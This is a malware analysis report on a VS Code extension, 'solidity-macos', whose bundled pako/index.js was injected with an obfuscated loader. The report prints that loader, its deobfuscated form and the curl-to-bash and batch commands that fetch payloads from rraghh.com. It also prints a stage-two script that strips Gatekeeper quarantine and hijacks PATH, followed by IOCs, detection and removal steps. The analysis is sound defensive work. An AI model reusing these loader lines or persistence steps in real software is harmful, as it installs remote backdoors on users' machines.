Executive Summary
A malicious Visual Studio Code extension disguised as a Solidity development tool has been discovered containing a sophisticated backdoor. The extension "solidity-macos" (version 0.1.8) published by IoliteLabs implements a supply chain attack by injecting malicious code into a legitimate dependency package.
🔴 THREAT LEVEL: CRITICAL
Extension Link: https://marketplace.visualstudio.com/items?itemName=IoliteLabs.solidity-macos
Key Findings
| Attribute | Details |
|---|---|
| Extension Name | solidity-macos |
| Publisher | IoliteLabs |
| Version | 0.1.8 |
| Attack Type | Supply Chain Attack |
| Affected Platforms | Windows, macOS |
| C&C Infrastructure |
rraghh.com, cdn.rraghh.com
|
| Discovery Date | March 28, 2026 |
| Status | Active threat |
Attack Overview
Infection Vector
The malware is embedded in the extension's dependency tree, specifically in the pako package's entry point file:
extension/node_modules/pako/index.js
The legitimate pako library (a JavaScript compression library) has been weaponized by injecting malicious code that executes automatically when the extension loads.
Execution Flow
VSCode Startup
↓
Extension Activation (onStartupFinished)
↓
require('pako')
↓
Malicious code execution in pako/index.js
↓
Platform detection (Windows/macOS)
↓
Download and execute remote payload
↓
Establish persistence
Technical Analysis
Malicious Code (Obfuscated)
The injected code in pako/index.js:
var _0xd35d=(965581^965578)+(724804^724800);
const cp=require("\u0063\u0068\u0069\u006C\u0064\u005F\u0070\u0072\u006F\u0063\u0065\u0073\u0073");
_0xd35d=176481^176486;
if(process['\u0070\u006C\u0061\u0074\u0066\u006F\u0072\u006D']==="\u0077\u0069\u006E\u0033\u0032"){
cp['\u0065\u0078\u0065\u0063']("\u0063\u0075\u0072\u006C\u0020\u002D\u006B\u0020\u002D\u004C\u0020\u002D\u0053\u0073\u0020\u0022\u0068\u0074\u0074\u0070\u0073\u003A\u002F\u002F\u0072\u0072\u0061\u0067\u0068\u0068\u002E\u0063\u006F\u006D\u002F\u0067\u0074\u002F\u0063\u0061\u006C\u0063\u002E\u0062\u0061\u0074\u0022\u0020\u002D\u006F\u0020\u0022\u0025\u0054\u0045\u004D\u0050\u0025\u005C\u0031\u002E\u0062\u0061\u0074\u0022\u0020\u0026\u0026\u0020\u0073\u0074\u0061\u0072\u0074\u0020\u002F\u0062\u0020\u0022\u0022\u0020\u0022\u0025\u0054\u0045\u004D\u0050\u0025\u005C\u0031\u002E\u0062\u0061\u0074\u0022",
{'\u0064\u0065\u0074\u0061\u0063\u0068\u0065\u0064':!![],'\u0073\u0074\u0064\u0069\u006F':'ignore'})['\u0075\u006E\u0072\u0065\u0066']();
} else if(process['\u0070\u006C\u0061\u0074\u0066\u006F\u0072\u006D']==="niwrad".split("").reverse().join("")){
cp['\u0065\u0078\u0065\u0063']("\u0063\u0075\u0072\u006C\u0020\u002D\u0066\u0073\u0053\u004C\u0020\u0068\u0074\u0074\u0070\u0073\u003A\u002F\u002F\u0063\u0064\u006E\u002E\u0072\u0072\u0061\u0067\u0068\u0068\u002E\u0063\u006F\u006D\u002F\u0067\u0074\u002F\u0064\u006F\u0063\u002E\u0073\u0068\u0020\u007C\u0020\u0062\u0061\u0073\u0068",
{'\u0064\u0065\u0074\u0061\u0063\u0068\u0065\u0064':!![],"stdio":"\u0069\u0067\u006E\u006F\u0072\u0065"})['\u0075\u006E\u0072\u0065\u0066']();
}
Deobfuscated Code
const cp = require("child_process");
if (process['platform'] === "win32") {
// Windows payload
cp['exec'](
'curl -k -LSs "https://rraghh.com/gt/calc.bat" -o "%TEMP%\\1.bat" && start /b "" "%TEMP%\\1.bat"',
{
'detached': true,
'stdio': 'ignore'
}
)['unref']();
} else if (process['platform'] === "darwin") {
// macOS payload ("niwrad" reversed = "darwin")
cp['exec'](
'curl -fsSL https://cdn.rraghh.com/gt/doc.sh | bash',
{
'detached': true,
'stdio': 'ignore'
}
)['unref']();
}
Obfuscation Techniques
| Technique | Purpose | Example |
|---|---|---|
| Unicode Escaping | Hide keywords |
\u0063\u0068\u0069\u006C\u0064_\u0070\u0072\u006F\u0063\u0065\u0073\u0073 → child_process
|
| XOR Operations | Obfuscate numbers |
965581^965578 → 7
|
| String Reversal | Hide platform names |
"niwrad".split("").reverse().join("") → "darwin"
|
| Boolean Obfuscation | Hide true values |
!![] → true
|
macOS Attack Chain
Stage 1: Initial Payload Download
curl -fsSL https://cdn.rraghh.com/gt/doc.sh | bash
The downloaded script (doc.sh) contains:
#!/bin/bash
mkdir -p ~/.local/bin && \
curl -sL https://cdn.rraghh.com/gt/doc -o ~/.local/bin/updater && \
chmod +x ~/.local/bin/updater && \
xattr -d com.apple.quarantine ~/.local/bin/updater 2>/dev/null || true && \
xattr -c ~/.local/bin/updater 2>/dev/null || true && \
echo 'export PATH="$HOME/.local/bin:$PATH"' >> ~/.zshrc 2>/dev/null && \
echo 'export PATH="$HOME/.local/bin:$PATH"' >> ~/.bash_profile 2>/dev/null && \
~/.local/bin/updater
Stage 2: Persistence Mechanism
1. Create Hidden Directory
mkdir -p ~/.local/bin
2. Download Backdoor Binary
curl -sL https://cdn.rraghh.com/gt/doc -o ~/.local/bin/updater
3. Make Executable
chmod +x ~/.local/bin/updater
4. Bypass macOS Gatekeeper
xattr -d com.apple.quarantine ~/.local/bin/updater
xattr -c ~/.local/bin/updater
Removes quarantine attributes to prevent security warnings.
5. PATH Hijacking
echo 'export PATH="$HOME/.local/bin:$PATH"' >> ~/.zshrc
echo 'export PATH="$HOME/.local/bin:$PATH"' >> ~/.bash_profile
Prepends malicious directory to PATH, enabling command interception.
6. Execute Backdoor
~/.local/bin/updater
Windows Attack Chain
Payload Execution
curl -k -LSs "https://rraghh.com/gt/calc.bat" -o "%TEMP%\1.bat" && start /b "" "%TEMP%\1.bat"
Breakdown:
- Downloads
calc.batto temporary directory - Executes in background using
start /b - Likely contains similar persistence mechanisms
Stealth Techniques
Process Hiding
{
'detached': true, // Detach from parent process
'stdio': 'ignore' // Suppress all output
}
.unref(); // Allow parent to exit independently
Effects:
- Malicious process runs silently in background
- No console output visible to user
- Does not block VSCode startup
- Cannot be traced from VSCode process tree
Anti-Detection Features
- Code Obfuscation: Unicode escaping + XOR operations
- String Encryption: All keywords encoded
- Delayed Execution: Triggers only on extension load
- Fileless Execution: macOS version pipes directly to bash
- Legitimate Cover: Disguised as Solidity development tool
Indicators of Compromise (IOCs)
Network Indicators
Domains:
rraghh.com
cdn.rraghh.com
*.rraghh.com
URLs:
https://rraghh.com/gt/calc.bat
https://cdn.rraghh.com/gt/doc.sh
https://cdn.rraghh.com/gt/doc
File System Indicators
macOS:
~/.local/bin/updater
~/.local/bin/apple
~/.local/bin/.system_updater
Windows:
%TEMP%\1.bat
Modified Files:
~/.zshrc
~/.bash_profile
File Hashes
SHA256(extension/node_modules/pako/index.js):
fcd398abc51fd16e8bc93ef8d88a23d7dec28081b6dfce4b933020322a610508
Process Indicators
Process Names:
updater
apple
.system_updater
Command Lines:
curl -fsSL https://cdn.rraghh.com/gt/doc.sh | bash
bash -c "curl -fsSL https://cdn.rraghh.com/gt/doc.sh | bash"
Detection Methods
1. Extension Audit
# List all installed extensions
code --list-extensions --show-versions | grep -i solidity
# Check for malicious extension
ls -la ~/.vscode/extensions/ | grep -i "iolite"
2. File Integrity Check
# Check if pako/index.js is compromised
find ~/.vscode/extensions -name "pako" -type d -exec grep -l "child_process\|rraghh" {}/index.js \;
3. Process Monitoring
# macOS
ps aux | grep -E "updater|\.local/bin/apple|rraghh"
# Check network connections
lsof -i | grep -E "rraghh"
netstat -an | grep -E "rraghh"
4. File System Check
# Check for malicious binaries
ls -la ~/.local/bin/
file ~/.local/bin/updater 2>/dev/null
# Check shell configuration
grep -n "\.local/bin" ~/.zshrc ~/.bash_profile
5. Network Traffic Analysis
# Monitor DNS queries
sudo tcpdump -i any port 53 | grep rraghh
# Monitor HTTPS connections
sudo tcpdump -i any host rraghh.com or host cdn.rraghh.com
Removal Instructions
Immediate Actions
Step 1: Terminate Malicious Processes
# macOS/Linux
pkill -9 -f "\.local/bin/apple"
pkill -9 -f "\.local/bin/updater"
pkill -9 -f "\.local/bin/.system_updater"
# Windows
taskkill /F /IM updater.exe
taskkill /F /IM apple.exe
Step 2: Remove Malicious Files
# macOS/Linux
rm -f ~/.local/bin/apple
rm -f ~/.local/bin/updater
rm -f ~/.local/bin/.system_updater
# If entire directory is compromised
rm -rf ~/.local/bin/
# Windows
del %TEMP%\1.bat
del %LOCALAPPDATA%\updater.exe
Step 3: Clean Shell Configuration
# Backup first
cp ~/.zshrc ~/.zshrc.backup
cp ~/.bash_profile ~/.bash_profile.backup
# Remove malicious PATH entries
sed -i.bak '/\.local\/bin/d' ~/.zshrc
sed -i.bak '/\.local\/bin/d' ~/.bash_profile
# Or manually edit
vim ~/.zshrc
vim ~/.bash_profile
Step 4: Uninstall Extension
# Via command line
code --uninstall-extension IoliteLabs.solidity-macos
# Manual removal
rm -rf ~/.vscode/extensions/iolitelabs.solidity-macos-*
# Remove cached VSIX
rm -f ~/Library/Application\ Support/Code/CachedExtensionVSIXs/iolitelabs.solidity-macos-*
Step 5: Check LaunchAgents (macOS)
# List launch agents
ls -la ~/Library/LaunchAgents/
ls -la /Library/LaunchAgents/
ls -la /Library/LaunchDaemons/
# Check running agents
launchctl list | grep -E "updater|apple|rraghh"
# Remove suspicious agents
launchctl unload ~/Library/LaunchAgents/com.suspicious.plist
rm ~/Library/LaunchAgents/com.suspicious.plist
Step 6: Check Scheduled Tasks
# macOS/Linux
crontab -l
# If malicious entries found:
crontab -e
# Windows
schtasks /query /fo LIST /v | findstr updater
schtasks /delete /tn "TaskName" /f
Step 7: Restart Shell
# Reload configuration
source ~/.zshrc
# Or restart terminal
Advanced Forensics
Memory Analysis
# Dump process memory (macOS)
sudo gcore -o /tmp/updater.dump $(pgrep updater)
# Analyze with strings
strings /tmp/updater.dump.* | grep -E "http|rraghh|password|key"
Network Forensics
# Capture traffic for analysis
sudo tcpdump -i any -w /tmp/capture.pcap host rraghh.com
# Analyze with Wireshark or tshark
tshark -r /tmp/capture.pcap -Y "http or dns"
File System Timeline
# Find recently modified files
find ~ -type f -mtime -7 -ls
# Find recently created executables
find ~ -type f -perm +111 -mtime -7
Prevention Strategies
For Individual Developers
-
Install Extensions from Official Marketplace Only
- Verify publisher identity
- Check extension ratings and reviews
- Review installation count and update frequency
Review Extension Permissions
// Check package.json for suspicious activationEvents
"activationEvents": [
"onStartupFinished", // ⚠️ Auto-runs on startup
"*" // ⚠️ Runs on any event
]
- Audit Installed Extensions Regularly
code --list-extensions --show-versions > extensions.txt
diff extensions.txt extensions.txt.old
- Use Dependency Lock Files
# Verify package integrity
npm ci # Uses package-lock.json
- Enable VSCode Security Features
{
"extensions.autoCheckUpdates": false,
"extensions.autoUpdate": false,
"security.workspace.trust.enabled": true
}
For Organizations
- Implement Extension Allowlisting
// settings.json
{
"extensions.autoCheckUpdates": false,
"extensions.autoUpdate": false
}
-
Deploy Private Extension Marketplace
- Host vetted extensions internally
- Scan extensions before approval
Network-Level Protection
# Block malicious domains at firewall/DNS
rraghh.com
cdn.rraghh.com
*.rraghh.com
-
Endpoint Detection and Response (EDR)
- Monitor for suspicious child processes from VSCode
- Alert on curl/wget piped to bash
- Detect PATH modifications
File Integrity Monitoring (FIM)
# Monitor critical files
~/.zshrc
~/.bash_profile
~/.local/bin/
~/.vscode/extensions/
-
Security Awareness Training
- Educate developers about supply chain attacks
- Establish incident response procedures
MITRE ATT&CK Mapping
| Tactic | Technique | ID | Description |
|---|---|---|---|
| Initial Access | Supply Chain Compromise | T1195.002 | Compromise software dependencies |
| Execution | Command and Scripting Interpreter | T1059.004 | Execute bash/batch scripts |
| Persistence | Path Interception | T1574.007 | Hijack PATH environment variable |
| Defense Evasion | Obfuscated Files or Information | T1027 | Unicode escaping, XOR obfuscation |
| Defense Evasion | Subvert Trust Controls | T1553.001 | Remove Gatekeeper quarantine attributes |
| Command and Control | Web Protocols | T1071.001 | HTTPS for C&C communication |
Attribution Analysis
Threat Actor Profile
Sophistication Level: Intermediate to Advanced
Capabilities:
- JavaScript obfuscation techniques
- Cross-platform malware development
- Supply chain attack methodology
- Infrastructure management (CDN usage)
Targeting:
- Blockchain/Web3 developers (Solidity focus)
- Cryptocurrency wallet theft potential
- Supply chain compromise for downstream attacks
Infrastructure:
- CDN-based payload distribution
- Domain privacy protection
- Likely cloud-hosted C&C servers
Similar Campaigns
-
event-stream (2018)
- npm package compromised
- Targeted cryptocurrency wallets
- Affected 8 million downloads
-
ua-parser-js (2021)
- npm package hijacked
- Deployed cryptocurrency miners
- Affected millions of projects
-
VSCode "prettiest" (2023)
- Fake code formatter extension
- Stole credentials and tokens
- Removed from marketplace
Timeline
| Date | Event |
|---|---|
| 2026-03-25 | Malicious extension packaged (VSIX timestamp) |
| 2026-03-26 16:27 | Extension files extracted locally |
| 2026-03-27 | User installs extension |
| 2026-03-28 02:33 | Suspicious process "apple" detected (PID 3009) |
| 2026-03-28 03:00+ | Analysis and remediation begins |
Recommendations
Immediate Actions
- ✅ Uninstall the extension immediately
- ✅ Run full system malware scan
- ✅ Change all passwords and API keys
- ✅ Review cryptocurrency wallet activity
- ✅ Check for unauthorized access to accounts
Short-term Actions
- 🔍 Audit all installed VSCode extensions
- 🔍 Review recent system and network activity
- 🔍 Scan all projects for injected code
- 🔍 Notify team members if extension was shared
Long-term Actions
- 🛡️ Implement extension vetting process
- 🛡️ Deploy EDR/FIM solutions
- 🛡️ Establish security monitoring
- 🛡️ Conduct security awareness training
Reporting
If you have been affected by this malware or have additional information:
Report to VSCode Security Team
Report to npm Security Team
- Email: security@npmjs.com
- HackerOne: https://hackerone.com/npmjs
Share IOCs with Community
- Twitter: Use hashtag #VSCodeMalware
- Reddit: r/netsec, r/vscode
- Security Mailing Lists: Full Disclosure, BugTraq
References
-
VSCode Extension Security
-
npm Security Best Practices
-
macOS Security
- Gatekeeper: https://support.apple.com/en-us/HT202491
- XProtect: https://support.apple.com/guide/security/
-
MITRE ATT&CK Framework
-
Supply Chain Attack Resources
Disclaimer
This report is provided for security research and educational purposes only. The information should not be used for malicious purposes. The author is not responsible for any misuse of the techniques described herein.
Contact
For questions or additional information about this analysis:
- Report Issues: Create an issue on GitHub
- Security Researchers: Contact via security mailing lists
- Media Inquiries: Please cite this report appropriately
Report Generated: March 28, 2026
Analysis Tools: Claude Code, VSCode, macOS system utilities
Report Version: 1.0 (English)
Acknowledgments
Thanks to the security community for their ongoing efforts to identify and mitigate supply chain attacks. Stay vigilant and always verify your dependencies.
#StaySafeOnline #SupplyChainSecurity #VSCodeSecurity
Top comments (0)